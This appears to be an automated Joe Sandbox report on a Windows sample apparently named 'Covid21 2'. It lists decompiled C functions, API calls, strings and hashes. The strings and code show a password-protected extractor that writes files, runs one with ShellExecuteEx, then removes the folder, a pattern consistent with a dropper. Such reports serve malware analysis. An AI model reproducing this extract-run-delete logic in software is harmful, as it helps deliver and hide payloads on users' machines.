                                    • Part of subcall function 004030A0: RtlAllocateHeap.NTDLL(00000008,-00000018,00000401), ref: 004030B5
                                    • Part of subcall function 00403DC0: RtlAllocateHeap.NTDLL(00D40000,00000008,00000000), ref: 00403DD1
                                  • GetUserDefaultLangID.KERNEL32(00000008,00000400,00000008,0040A37C,0040B1F4,00000007,00000008,00000000,0040A384,00000007,00000000,00001000,00000000,00000000), ref: 004010CF
                                  • VerLanguageNameA.KERNEL32(00000000,00000008,00000400,00000008,0040A37C,0040B1F4,00000007,00000008,00000000,0040A384,00000007,00000000,00001000,00000000,00000000), ref: 004010D5
                                  • CharLowerA.USER32(00000000,00000008,00000400,00000008,0040A37C,0040B1F4,00000007,00000008,00000000,0040A384,00000007,00000000,00001000,00000000,00000000), ref: 004010E0
                                    • Part of subcall function 00403E30: HeapFree.KERNEL32(00D40000,00000000,00000000,00401113,00000000,00000000), ref: 00403E3E
                                  • GetModuleHandleA.KERNEL32(00000000,00000000,00000000), ref: 00401311
                                    • Part of subcall function 00403A18: strncpy.MSVCRT ref: 00403A53
                                    • Part of subcall function 004074F0: strlen.MSVCRT ref: 00407503
                                    • Part of subcall function 004036A2: MessageBoxA.USER32(00000000,00000010,00000000,?), ref: 004036BC
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BBB
                                  • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BC6
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BCB
                                  Strings
                                  • Fortfahren?, xrefs: 0040112A
                                  • Password, xrefs: 004012AF
                                  • 2, xrefs: 004012D6
                                  • Bitte geben Sie das Passwort ein., xrefs: 004011EA
                                  • "*, xrefs: 00401383
                                  • Can not create some of your include files., xrefs: 0040121F
                                  • Fehler!, xrefs: 0040113A
                                  • Can not allocate the memory., xrefs: 0040122F
                                  • The file , xrefs: 0040125F
                                  • already exists in the current directory. Overwrite?, xrefs: 0040126F
                                  • An unknown error occured. The program will be terminated., xrefs: 0040127F
                                  • Choose a location to save the files., xrefs: 0040129F
                                  • This program is not supported on this operating system., xrefs: 0040128F
                                  • deutsch, xrefs: 00401119
                                  • Falsches Passwort., xrefs: 0040116A
                                  • Bitte whlen Sie einen Ordner zum Speichern der Dateien aus., xrefs: 004011CA
                                  • Continue?, xrefs: 004011FF
                                  • Overwrite?, xrefs: 0040124F
                                  • Wrong password., xrefs: 0040123F
                                  • Einige Include Dateien konnten nicht erstellt werden., xrefs: 0040114A
                                  • Please enter the password., xrefs: 004012BF
                                  • Die Datei , xrefs: 0040118A
                                  • \BDFINOPS, xrefs: 00401A4D
                                  • Error!, xrefs: 0040120F
                                  • Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet., xrefs: 004011AA
                                  • Passwort, xrefs: 004011DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateCreate$Initialize$CriticalExitFreeHandleLoadModuleProcessSectionmemset$CharCursorDefaultDestroyIconLangLanguageLowerMessageNameObjectStockUserstrlenstrncpy
                                  • String ID: "*$ already exists in the current directory. Overwrite?$2$An unknown error occured. The program will be terminated.$Bitte geben Sie das Passwort ein.$Bitte whlen Sie einen Ordner zum Speichern der Dateien aus.$Can not allocate the memory.$Can not create some of your include files.$Choose a location to save the files.$Continue?$Die Datei $Ein unbekannter Fehler ist aufgetreten. Das Programm wird beendet.$Einige Include Dateien konnten nicht erstellt werden.$Error!$Falsches Passwort.$Fehler!$Fortfahren?$Overwrite?$Password$Passwort$Please enter the password.$The file $This program is not supported on this operating system.$Wrong password.$\BDFINOPS$deutsch
                                  • API String ID: 602452764-4079455548
                                  • Opcode ID: e84a9e40abeb1d00b33dfa4709f4ce2b70badb24024655d8a4711a76d8606b70
                                  • Instruction ID: 3783c48d9a695ad555a110271d4ece50a90aebaed67b6da37d86febcd6e90675
                                  • Opcode Fuzzy Hash: e84a9e40abeb1d00b33dfa4709f4ce2b70badb24024655d8a4711a76d8606b70
                                  • Instruction Fuzzy Hash: CE423C71250201EBD700BF62EE62E693B65EB48749F50403BF9007E2F2CB7D5951AB9E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 362 402779-40277b 363 402780-40278b 362->363 363->363 364 40278d-4027f6 call 403100 * 3 ShellExecuteEx 363->364 371 4027fa-402817 Sleep GetExitCodeProcess 364->371 372 402827 371->372 373 402819-402823 371->373 372->371 373->372 374 402825-402851 call 407550 * 3 373->374
                                  C-Code - Quality: 95%
                                  			E00402779() {
                                  				intOrPtr _t32;
                                  				int _t34;
                                  				void* _t44;
                                  				intOrPtr* _t48;
                                  				intOrPtr* _t50;
                                  
                                  				_t44 = 0x14;
                                  				do {
                                  					_t50 = _t50 - 4;
                                  					 *_t50 = 0;
                                  					_t44 = _t44 - 1;
                                  				} while (_t44 != 0);
                                  				E00403100(_t50,  *((intOrPtr*)(_t50 + 0x5c)));
                                  				E00403100(_t50 + 4,  *((intOrPtr*)(_t50 + 0x60)));
                                  				E00403100(_t50 + 8,  *((intOrPtr*)(_t50 + 0x64)));
                                  				_t48 = _t50 + 0xc;
                                  				 *_t48 = 0x3c;
                                  				 *((intOrPtr*)(_t48 + 4)) = 0x140;
                                  				 *((intOrPtr*)(_t48 + 0x1c)) = 0;
                                  				 *(_t48 + 0xc) = "open";
                                  				 *((intOrPtr*)(_t48 + 0x10)) =  *_t50;
                                  				 *((intOrPtr*)(_t48 + 0x14)) =  *((intOrPtr*)(_t50 + 8));
                                  				 *((intOrPtr*)(_t48 + 0x18)) =  *((intOrPtr*)(_t50 + 4));
                                  				_t32 = _t50 + 0xc;
                                  				_push(_t32); // executed
                                  				L0040800B(); // executed
                                  				 *((intOrPtr*)(_t50 + 0x48)) = _t32;
                                  				while(1) {
                                  					Sleep(0x19); // executed
                                  					_t34 = GetExitCodeProcess( *(_t50 + 0x48), _t50 + 0x4c); // executed
                                  					if(_t34 != 0 &&  *(_t50 + 0x4c) != 0x103) {
                                  						break;
                                  					}
                                  				}
                                  				return E00407550(E00407550(E00407550(1,  *_t50),  *((intOrPtr*)(_t50 + 4))),  *((intOrPtr*)(_t50 + 8)));
                                  			}









                                  APIs
                                  • ShellExecuteEx.SHELL32(?), ref: 004027F1
                                  • Sleep.KERNEL32(00000019), ref: 004027FF
                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00402810
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: CodeExecuteExitProcessShellSleep
                                  • String ID: open
                                  • API String ID: 3887608683-2758837156
                                  • Opcode ID: df14b4278b00ed0d26c83213d7738cdcd665813f5d206012612cba75c38f70a4
                                  • Instruction ID: 008d11a2a8203ddc74c484c16875f5973d42d86a5d435cc8cf274525409f5c07
                                  • Opcode Fuzzy Hash: df14b4278b00ed0d26c83213d7738cdcd665813f5d206012612cba75c38f70a4
                                  • Instruction Fuzzy Hash: 0F213A71508309AFD700EF15C841A9FBBE4EF44308F10893EF49866290D779EA15DB86
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 389 406330-406343 390 406365-40636e 389->390 391 406345-406362 SetFilePointer 389->391 392 406370-40637d 390->392 393 4063de-4063e9 call 405f90 390->393 391->390 395 4063cb-4063db 392->395 396 40637f-406382 392->396 400 40640b-40642a memcpy 393->400 401 4063eb-406408 WriteFile 393->401 398 406384-406387 396->398 399 4063b6-4063c8 396->399 402 4063a3-4063b3 398->402 403 406389-4063a0 memcpy 398->403
                                  C-Code - Quality: 100%
                                  			E00406330(void** _a4, void* _a8, int _a12) {
                                  				long _v4;
                                  				void* _t34;
                                  				void* _t42;
                                  				void* _t51;
                                  				void* _t57;
                                  				void* _t59;
                                  				int _t71;
                                  				void** _t72;
                                  
                                  				_t72 = _a4;
                                  				_v4 = 0;
                                  				if(_t72[5] == 1) {
                                  					SetFilePointer( *_t72,  ~(_t72[3]), 0, 1); // executed
                                  					_t72[5] = 0;
                                  					_t72[3] = _t72[2];
                                  				}
                                  				_t51 = _t72[3];
                                  				_t71 = _a12;
                                  				if(_t51 <= _t71) {
                                  					E00405F90(_t72);
                                  					_t34 = _t72[2];
                                  					if(_t71 < _t34) {
                                  						memcpy(_t72[1] - _t72[3] + _t34, _a8, _t71);
                                  						_t72[3] = _t72[3] - _t71;
                                  						return _t71;
                                  					} else {
                                  						WriteFile( *_t72, _a8, _t71,  &_v4, 0); // executed
                                  						return _v4;
                                  					}
                                  				} else {
                                  					_t42 = _t72[2] + _t72[1] - _t51;
                                  					_t57 = _t71 - 1;
                                  					if(_t57 == 0) {
                                  						 *_t42 =  *_a8;
                                  						_t72[3] = _t72[3] - _t71;
                                  						return _t71;
                                  					} else {
                                  						_t59 = _t57 - 1;
                                  						if(_t59 == 0) {
                                  							 *_t42 =  *_a8;
                                  							_t72[3] = _t72[3] - _t71;
                                  							return _t71;
                                  						} else {
                                  							if(_t59 == 2) {
                                  								 *_t42 =  *_a8;
                                  								_t72[3] = _t72[3] - _t71;
                                  								return _t71;
                                  							} else {
                                  								memcpy(_t42, _a8, _t71);
                                  								_t72[3] = _t72[3] - _t71;
                                  								return _t71;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}












                                  APIs
                                  • SetFilePointer.KERNELBASE(?,?,00000000,00000001,?,?,?,00406298,00000000,?,?,?,027D05A8,00000000), ref: 00406352
                                  • memcpy.MSVCRT ref: 00406390
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: FilePointermemcpy
                                  • String ID:
                                  • API String ID: 1104741977-0
                                  • Opcode ID: b49d06cf3595ba276dc545326d44b73e09d5a742b1af48970d0989ac99cef6b7
                                  • Instruction ID: 6313678625fda58dd2c5a9f412bfcc8c508d375f5e4440298ee736b1d6e11be6
                                  • Opcode Fuzzy Hash: b49d06cf3595ba276dc545326d44b73e09d5a742b1af48970d0989ac99cef6b7
                                  • Instruction Fuzzy Hash: 95316C763006009FC224DF2AD448E5BF7E9EFD4321F14C82EE69697B90C634E854CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 404 4015f4 405 401689-40168a call 40505e 404->405 409 4015f9-401601 405->409 410 4015dc-4015ef _rmdir 405->410 412 401642-40164a 409->412 413 401603-401611 call 405066 409->413 411 401bbb-401bcb ExitProcess HeapDestroy ExitProcess 410->411 412->405 415 40164c-40165a call 405074 412->415 418 401613-40163d call 4045fc call 4030f0 call 404925 413->418 419 40163f-401640 413->419 422 401688 415->422 423 40165c-401686 call 4045fc call 4030f0 call 404925 415->423 435 40168f-4016e4 call 4031f0 call 406860 call 403de0 call 4074c0 418->435 419->405 422->405 423->435 444 401714-401726 call 4020c9 435->444 445 4016e6-40170f call 4036a2 _rmdir 435->445 450 401732-4017c7 call 401d57 call 403de0 call 4030f0 call 403de0 call 4030f0 call 4020c9 444->450 451 401728-40172d 444->451 445->411 464 401a3c-401a80 call 4074f0 * 3 call 4030f0 call 406170 450->464 465 4017cd-401815 call 403a18 call 403de0 call 4074c0 450->465 451->450 489 401a82-401ae9 call 406250 call 405fd0 call 4074c0 464->489 490 401a9e-401ad7 call 405ea0 call 40203d call 4036a2 _rmdir 464->490 478 401817-401820 465->478 479 401829 465->479 478->479 482 401822-401827 478->482 483 40182b-40182d 479->483 482->483 483->464 485 401833-40187a call 405dd5 call 4036f8 call 4030f0 call 4074c0 483->485 510 401880-4018aa call 4074f0 call 4030f0 call 4074c0 485->510 511 4019dd-401a37 call 403a79 call 405e15 call 405e90 _rmdir 485->511 512 401af6-401ba9 call 4074f0 * 2 call 402779 call 40203d call 405ea0 call 403a79 call 405e15 call 405e90 _rmdir 489->512 513 401aeb-401af1 call 402130 489->513 490->411 533 4018b7-4018c9 call 406230 510->533 534 4018ac-4018b2 call 402130 510->534 511->411 512->411 513->512 540 4019af-4019c1 call 406170 533->540 541 4018cf-40194e call 405fd0 call 4074f0 * 5 call 4036a2 533->541 534->533 540->511 551 4019c3-4019d8 call 406250 call 405fd0 540->551 541->540 570 401950-4019aa call 403a79 call 405e15 call 405e90 _rmdir 541->570 551->511 570->411
                                  C-Code - Quality: 76%
                                  			E004015F4(void* __ecx, void* __edi, void* __esi) {
                                  				intOrPtr _v56;
                                  				intOrPtr _v64;
                                  				intOrPtr _t11;
                                  				intOrPtr _t15;
                                  				void* _t16;
                                  				intOrPtr _t17;
                                  				intOrPtr _t19;
                                  				intOrPtr* _t22;
                                  				intOrPtr _t25;
                                  				intOrPtr _t28;
                                  				intOrPtr* _t31;
                                  				intOrPtr* _t37;
                                  				intOrPtr _t59;
                                  				void* _t61;
                                  				intOrPtr _t64;
                                  				intOrPtr _t66;
                                  				intOrPtr* _t69;
                                  				intOrPtr _t71;
                                  				intOrPtr _t72;
                                  				intOrPtr _t77;
                                  				intOrPtr _t78;
                                  				void* _t80;
                                  				intOrPtr _t97;
                                  				intOrPtr _t98;
                                  				intOrPtr _t99;
                                  				void* _t101;
                                  				intOrPtr _t104;
                                  				intOrPtr _t108;
                                  				intOrPtr _t116;
                                  				intOrPtr _t117;
                                  				intOrPtr _t121;
                                  				intOrPtr _t125;
                                  				void* _t130;
                                  				void* _t131;
                                  				void* _t133;
                                  				void* _t134;
                                  				intOrPtr _t135;
                                  				intOrPtr _t137;
                                  				void* _t138;
                                  				intOrPtr _t139;
                                  				intOrPtr _t140;
                                  				intOrPtr _t141;
                                  				intOrPtr _t142;
                                  				intOrPtr _t143;
                                  				intOrPtr _t144;
                                  				void* _t145;
                                  				intOrPtr _t147;
                                  				void* _t148;
                                  				intOrPtr _t149;
                                  				intOrPtr _t150;
                                  				intOrPtr _t151;
                                  				intOrPtr _t152;
                                  				void* _t153;
                                  				intOrPtr _t154;
                                  				intOrPtr _t155;
                                  				intOrPtr _t157;
                                  				intOrPtr _t159;
                                  				intOrPtr _t160;
                                  				intOrPtr _t161;
                                  				intOrPtr _t162;
                                  				void* _t163;
                                  				void* _t164;
                                  				void* _t165;
                                  				intOrPtr* _t166;
                                  				intOrPtr* _t167;
                                  
                                  				_t165 = __esi;
                                  				_t164 = __edi;
                                  				while(1) {
                                  					_push(E0040505E());
                                  					if(0x10 ==  *_t166) {
                                  						break;
                                  					}
                                  					__eflags = 0x332d -  *_t166;
                                  					if(0x332d !=  *_t166) {
                                  						__eflags = 0x332c -  *_t166;
                                  						if(0x332c !=  *_t166) {
                                  							continue;
                                  						} else {
                                  							_push(E00405074());
                                  							__eflags = 3 -  *_t166;
                                  							if(__eflags != 0) {
                                  								continue;
                                  							} else {
                                  								_t11 =  *0x40b3f8; // 0x0
                                  								E004045FC(__eflags, 2, _t11);
                                  								_t130 = _t11;
                                  								E004030F0(0x40b1dc, _t130);
                                  								E00404925(_t164, __eflags, 0);
                                  								_t167 = _t166 + 8;
                                  								goto L12;
                                  							}
                                  						}
                                  					} else {
                                  						_push(E00405066());
                                  						__eflags = 4 -  *_t166;
                                  						if(__eflags != 0) {
                                  							continue;
                                  						} else {
                                  							_t108 =  *0x40b3f8; // 0x0
                                  							E004045FC(__eflags, 2, _t108);
                                  							_t163 = _t108;
                                  							E004030F0(0x40b1dc, _t163);
                                  							E00404925(_t164, __eflags, 0);
                                  							_t167 = _t166 + 8;
                                  							L12:
                                  							_t15 =  *0x40b3f8; // 0x0
                                  							_push(_t15);
                                  							_t16 = E004031F0( *0x40b1dc);
                                  							_t17 =  *0x40b1dc; // 0x0
                                  							E00406860(__eflags, _t17, _t16, _t15);
                                  							 *0x40b3f8 =  *0x40b3f8 + 1;
                                  							_t19 =  *0x40b3f8; // 0x0
                                  							E00403DE0( *0x40b174,  *0x40b1b0);
                                  							_t131 = _t19;
                                  							_t121 = _t19;
                                  							 *0x40b3f8 = _t121;
                                  							_t122 = _t121 +  *0x40a38c;
                                  							__eflags = _t131 +  *0x40a38c;
                                  							E004074C0(_t121 +  *0x40a38c, _t131 +  *0x40a38c);
                                  							if(__eflags != 0) {
                                  								_t22 = E004020C9( *0x40b1b8, 0x40a0c9);
                                  								__eflags = _t22;
                                  								if(_t22 != 0) {
                                  									_t104 =  *0x40b174; // 0x43e018
                                  									 *0x40b1e0 = _t104;
                                  								}
                                  								_push( *0x40b15c);
                                  								_push( *0x40b158);
                                  								_push( *0x40b154);
                                  								_push( *0x40b1e0);
                                  								_push( *0x40b1d8);
                                  								_push( *0x40b1d4);
                                  								_push( *0x40b1d0);
                                  								_push( *0x40b1dc);
                                  								_push( *0x40b1b8);
                                  								E00401D57();
                                  								_t25 =  *0x40b3f8; // 0x0
                                  								_push(_t25);
                                  								E00403DE0( *0x40b148,  *0x40b154);
                                  								_t133 = _t25;
                                  								E004030F0(0x40b1e4, _t133);
                                  								_t28 =  *0x40b3f8; // 0x0
                                  								_push(_t28);
                                  								E00403DE0( *0x40b14c,  *0x40b158);
                                  								_t134 = _t28;
                                  								E004030F0(0x40b1e8, _t134);
                                  								_t31 = E004020C9( *0x40b1b8, "DFINOPS");
                                  								__eflags = _t31;
                                  								if(_t31 == 0) {
                                  									L32:
                                  									_t135 =  *0x40b170; // 0x29a4838
                                  									_push( *0x40b3f8);
                                  									E004074F0(_t135);
                                  									E004074F0(0x40a0b9);
                                  									_t137 =  *0x40b1cc; // 0x29a4f30
                                  									E004074F0(_t137);
                                  									_t122 = 0x40b1cc;
                                  									_pop(_t138);
                                  									E004030F0(0x40b1cc, _t138);
                                  									_push( *0x40b1cc);
                                  									_t37 = E00406170(__eflags, 1);
                                  									__eflags = _t37;
                                  									if(_t37 == 0) {
                                  										E00405EA0( *0x40b1cc);
                                  										E0040203D();
                                  										_push(0x10);
                                  										E004036A2( *0x40b180,  *0x40b19c);
                                  										_push( *0x40b170);
                                  										L00403196();
                                  										_push(1);
                                  									} else {
                                  										E00406250(_t164, 1,  *0x40b1e4);
                                  										E00405FD0(1);
                                  										_t139 =  *0x40b1e8; // 0x29a4e60
                                  										_t122 = 0;
                                  										__eflags = 0;
                                  										E004074C0(0, _t139);
                                  										if(__eflags == 0) {
                                  											_push( *0x40b1e8);
                                  											E00402130();
                                  										}
                                  										_push( *0x40b3f8);
                                  										_t140 =  *0x40b1c4; // 0x0
                                  										_push( *0x40b3f8);
                                  										E004074F0(_t140);
                                  										_t141 =  *0x40b16c; // 0x0
                                  										E004074F0(_t141);
                                  										 *0x40b3f8 =  *0x40b3f8 + 1;
                                  										_push( *0x40b168);
                                  										_push( *0x40b1cc);
                                  										_t142 =  *0x40a38c; // 0x29a06f0
                                  										_v56 = _v56 + _t142;
                                  										E00402779();
                                  										_pop( *0x40b3f8);
                                  										E0040203D();
                                  										E00405EA0( *0x40b1cc); // executed
                                  										_push( *0x40b3f8);
                                  										_t59 =  *0x40b3f8; // 0x0
                                  										E00403A79(__eflags,  *0x40b3f8);
                                  										 *0x40b3f8 =  *0x40b3f8 + 1;
                                  										_t143 =  *0x40a38c; // 0x29a06f0
                                  										 *_t167 =  *_t167 + _t143;
                                  										_t61 = E00405E15(_t59, _t59);
                                  										 *0x40b3f8 =  *0x40b3f8 + 1;
                                  										_t144 =  *0x40a38c; // 0x29a06f0
                                  										 *_t167 =  *_t167 + _t144; // executed
                                  										E00405E90(_t61,  *0x40b3f8); // executed
                                  										_pop( *0x40b3f8);
                                  										_push( *0x40b170); // executed
                                  										L00403196(); // executed
                                  										_push(0);
                                  									}
                                  								} else {
                                  									_t64 =  *0x40b3f8; // 0x0
                                  									_push(_t64);
                                  									E00403A18(0x40b1e8, 0, _t64);
                                  									 *0x40b3f8 =  *0x40b3f8 + 1;
                                  									_t66 =  *0x40b3f8; // 0x0
                                  									E00403DE0( *0x40b174,  *0x40b1b0);
                                  									_t145 = _t66;
                                  									_t125 = _t66;
                                  									 *0x40b3f8 = _t125;
                                  									_t126 = _t125 +  *0x40a38c;
                                  									__eflags = _t145 +  *0x40a38c;
                                  									E004074C0(_t125 +  *0x40a38c, _t145 +  *0x40a38c);
                                  									if(__eflags == 0) {
                                  										L21:
                                  										_t69 = 0;
                                  										__eflags = 0;
                                  									} else {
                                  										_t117 =  *0x40b1b4; // 0x0
                                  										__eflags = _t117 - 1;
                                  										if(_t117 != 1) {
                                  											goto L21;
                                  										} else {
                                  											_t69 = 1;
                                  										}
                                  									}
                                  									__eflags = _t69;
                                  									if(__eflags == 0) {
                                  										goto L32;
                                  									} else {
                                  										_t71 =  *0x40b3f8; // 0x0
                                  										_t72 =  *0x40b3f8; // 0x0
                                  										E00405DD5(__eflags, _t72);
                                  										 *0x40b3f8 =  *0x40b3f8 + 1;
                                  										_t147 =  *0x40a38c; // 0x29a06f0
                                  										_v64 = _v64 + _t147;
                                  										E004036F8(_t126, _t165,  *0x40b1a4, _t72, _t71);
                                  										_t148 = _t71;
                                  										E004030F0(0x40b1ec, _t148);
                                  										_t149 =  *0x40b1ec; // 0x0
                                  										_t122 = 0;
                                  										__eflags = 0;
                                  										E004074C0(0, _t149);
                                  										if(__eflags != 0) {
                                  											L31:
                                  											_t77 =  *0x40b3f8; // 0x0
                                  											_t78 =  *0x40b3f8; // 0x0
                                  											E00403A79(__eflags,  *0x40b3f8);
                                  											 *0x40b3f8 =  *0x40b3f8 + 1;
                                  											_t150 =  *0x40a38c; // 0x29a06f0
                                  											 *_t167 =  *_t167 + _t150;
                                  											_t80 = E00405E15(_t78, _t78);
                                  											 *0x40b3f8 =  *0x40b3f8 + 1;
                                  											_t151 =  *0x40a38c; // 0x29a06f0
                                  											 *_t167 =  *_t167 + _t151;
                                  											E00405E90(_t80, _t77);
                                  											 *0x40b3f8 = _t77;
                                  											_push( *0x40b170);
                                  											L00403196();
                                  											_push(0);
                                  										} else {
                                  											_t152 =  *0x40b1ec; // 0x0
                                  											_push( *0x40b3f8);
                                  											E004074F0(_t152);
                                  											_pop(_t153);
                                  											E004030F0(0x40b168, _t153);
                                  											_t154 =  *0x40b1e8; // 0x29a4e60
                                  											_t122 = 0;
                                  											__eflags = 0;
                                  											E004074C0(0, _t154);
                                  											if(__eflags == 0) {
                                  												_push( *0x40b1e8);
                                  												E00402130();
                                  											}
                                  											__eflags = E00406230(1,  *0x40b1cc);
                                  											if(__eflags == 0) {
                                  												L29:
                                  												_push( *0x40b1cc);
                                  												__eflags = E00406170(__eflags, 1);
                                  												if(__eflags != 0) {
                                  													E00406250(_t164, 1,  *0x40b1e4);
                                  													E00405FD0(1);
                                  												}
                                  												goto L31;
                                  											} else {
                                  												E00405FD0(1);
                                  												_push( *0x40b3f8);
                                  												_t155 =  *0x40b194; // 0x29a0588
                                  												E004074F0(_t155);
                                  												E004074F0(0x40a010);
                                  												_t157 =  *0x40b1cc; // 0x29a4f30
                                  												E004074F0(_t157);
                                  												E004074F0(0x40a010);
                                  												_t159 =  *0x40b198; // 0x29a05a0
                                  												E004074F0(_t159);
                                  												 *0x40b3f8 =  *0x40b3f8 + 1;
                                  												_t160 =  *0x40a38c; // 0x29a06f0
                                  												_v64 = _v64 + _t160;
                                  												_t97 = E004036A2( *0x40b190,  *0x40b3f8);
                                  												 *0x40b3f8 = 0x24;
                                  												 *0x40b1f0 = _t97;
                                  												_t116 =  *0x40b1f0; // 0x0
                                  												__eflags = _t116 - 7;
                                  												if(__eflags != 0) {
                                  													goto L29;
                                  												} else {
                                  													_t98 =  *0x40b3f8; // 0x0
                                  													_t99 =  *0x40b3f8; // 0x0
                                  													E00403A79(__eflags,  *0x40b3f8);
                                  													 *0x40b3f8 =  *0x40b3f8 + 1;
                                  													_t161 =  *0x40a38c; // 0x29a06f0
                                  													 *_t167 =  *_t167 + _t161;
                                  													_t101 = E00405E15(_t99, _t99);
                                  													 *0x40b3f8 =  *0x40b3f8 + 1;
                                  													_t162 =  *0x40a38c; // 0x29a06f0
                                  													 *_t167 =  *_t167 + _t162;
                                  													E00405E90(_t101, _t98);
                                  													 *0x40b3f8 = _t98;
                                  													_push( *0x40b170);
                                  													L00403196();
                                  													_push(0);
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							} else {
                                  								_push(0x10);
                                  								E004036A2( *0x40b180,  *0x40b18c);
                                  								_push( *0x40b170);
                                  								L00403196();
                                  								_push(1);
                                  							}
                                  						}
                                  					}
                                  					L38:
                                  					ExitProcess();
                                  					HeapDestroy( *0x40b13c); // executed
                                  					ExitProcess(??); // executed
                                  					E00403B0B();
                                  					E00403DB0(E00403CC0());
                                  					E00404150();
                                  					E00404A13(_t122);
                                  					return E0040681C(E00406030());
                                  				}
                                  				_push( *0x40b170);
                                  				L00403196();
                                  				_push(0);
                                  				goto L38;
                                  			}
                                  0x004015ea
                                  0x00000000

                                  APIs
                                  • _rmdir.MSVCRT ref: 004015E2
                                  • _rmdir.MSVCRT ref: 00401702
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BBB
                                  • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BC6
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BCB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.754042470.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.754036386.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000000.00000002.754049956.0000000000409000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754058059.000000000043D000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754322945.0000000000611000.00000040.00020000.sdmp
                                  • Associated: 00000000.00000002.754390684.000000000069A000.00000080.00020000.sdmp
                                  • Associated: 00000000.00000002.754397672.000000000069C000.00000004.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_Covid21 2.jbxd
                                  Similarity
                                  • API ID: ExitProcess_rmdir$DestroyHeap
                                  • String ID:
                                  • API String ID: 2349447675-0
                                  • Opcode ID: ae173b18bee318a8e6ee3c6bd9685daada826712dcb14547edc22c3fc5a19cf2
                                  • Instruction ID: 60e15e31e36ec4f341ea57578d9192aa5bb5f3c1abe7231800a78ac4dbabb27b
                                  • Opcode Fuzzy Hash: ae173b18bee318a8e6ee3c6bd9685daada826712dcb14547edc22c3fc5a19cf2
                                  • Instruction Fuzzy Hash: 98E0E57106460099D9407BB2A993A1D29689F8835EF10047FF582781E39A3D5651657F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 577 401bac-401bcb FreeLibrary ExitProcess HeapDestroy ExitProcess
                                  C-Code - Quality: 35%
                                  			E00401BAC(void* __eax, void* __ecx) {
                                  				void* _t12;
                                  
                                  				_t12 = __ecx;
                                  				FreeLibrary(??);
                                  				_push(0);
                                  				ExitProcess();
                                  				HeapDestroy( *0x40b13c); // executed
                                  				ExitProcess(??); // executed
                                  				E00403B0B();
                                  				E00403DB0(E00403CC0());
                                  				E00404150();
                                  				E00404A13(_t12);
                                  				return E0040681C(E00406030());
                                  			}





                                  APIs
                                  • FreeLibrary.KERNEL32 ref: 00401BB1
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BBB
                                  • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BC6
                                  • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BCB
                                  Similarity
                                  • API ID: ExitProcess$DestroyFreeHeapLibrary
                                  • String ID:
                                  • API String ID: 2053948195-0
